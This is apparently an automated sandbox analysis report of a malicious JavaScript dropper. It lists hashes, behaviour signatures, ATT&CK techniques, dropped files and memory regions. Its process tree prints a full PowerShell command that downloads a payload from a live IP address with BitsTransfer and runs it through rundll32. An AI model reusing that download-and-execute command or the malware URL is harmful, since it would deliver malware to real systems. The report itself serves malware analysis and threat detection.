Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 06:05

General

  • Target

    9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js

  • Size

    134KB

  • MD5

    1f2912c0c12b316023061de20ee3cc55

  • SHA1

    05cad925852e41a0832bc9bf3db5056990d027d4

  • SHA256

    9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330

  • SHA512

    226d9de84f0a3624e8b84ec3f89026299d457907faab3246694b04de40af76d927561ccbf463444e5049dd55ac2a72f4e727c6e10f4a490604c01738142c7f5b

  • SSDEEP

    1536:BIscHpcWN6ns7eemQA1iPFmpcEo0SlWu37kxlvtqMPeHp6o:5cHDesSemV1iQWEo0SlWA7Alvtl8f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9

Signatures

  • Blocklisted process makes network request 21 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\vnbqsz3w.xaa,Start
          4⤵
          • Drops file in Windows directory
          PID:2628
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {FE56A16F-4024-4C49-96B9-D4201DF5FD79} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1836
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\ProgramData\RtlCpl\RtlCpl.dll",Start /p
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:1888

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

2
T1059

PowerShell

1
T1059.001

JavaScript

1
T1059.007

Discovery

Query Registry

2
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\RtlCpl\RtlCpl.dll
    Filesize

    59KB

    MD5

    59fcd8a54f43d911fc7a8945e07b0246

    SHA1

    759fcbf9f7a7d2ec42f938e0c69acfc07c682a97

    SHA256

    1bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d

    SHA512

    6d67da2334a4e2e4f4c615d8661a5df2be3fc5467f5636760c15322c3abe5cfe1df339b29dfa008362f6e34b8afad44aef6858eb8aa1cae9c2b0dc7cc2ba7332

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    2280203d45774540d3d0b00868c387b7

    SHA1

    0e2610ccaa52103851c31d8205e4162df3004f76

    SHA256

    653ba5372954ff068bbefa16ce51b61443f2da495e43cbb3b6fc057867e50d44

    SHA512

    45f6f3d92240105ab14bdcd0ff0f76be5b72034986c830a2861624d6e7c471e4dc68d9475758c9917cb802dcea4de457d0da96455f93c6f79ea1692c299cc68c

  • memory/1888-31-0x000007FEFAB70000-0x000007FEFAB87000-memory.dmp
    Filesize

    92KB

  • memory/1888-28-0x000007FEFAB70000-0x000007FEFAB87000-memory.dmp
    Filesize

    92KB

  • memory/2224-8-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-9-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-10-0x0000000002AF0000-0x0000000002B22000-memory.dmp
    Filesize

    200KB

  • memory/2224-11-0x0000000002AF0000-0x0000000002B22000-memory.dmp
    Filesize

    200KB

  • memory/2224-4-0x000007FEF556E000-0x000007FEF556F000-memory.dmp
    Filesize

    4KB

  • memory/2224-19-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-7-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-6-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB

  • memory/2224-5-0x000000001B680000-0x000000001B962000-memory.dmp
    Filesize

    2.9MB

  • memory/2628-20-0x000007FEFABC0000-0x000007FEFABD7000-memory.dmp
    Filesize

    92KB

  • memory/2744-17-0x0000000002AE0000-0x0000000002B02000-memory.dmp
    Filesize

    136KB

  • memory/2744-18-0x00000000029E0000-0x00000000029F2000-memory.dmp
    Filesize

    72KB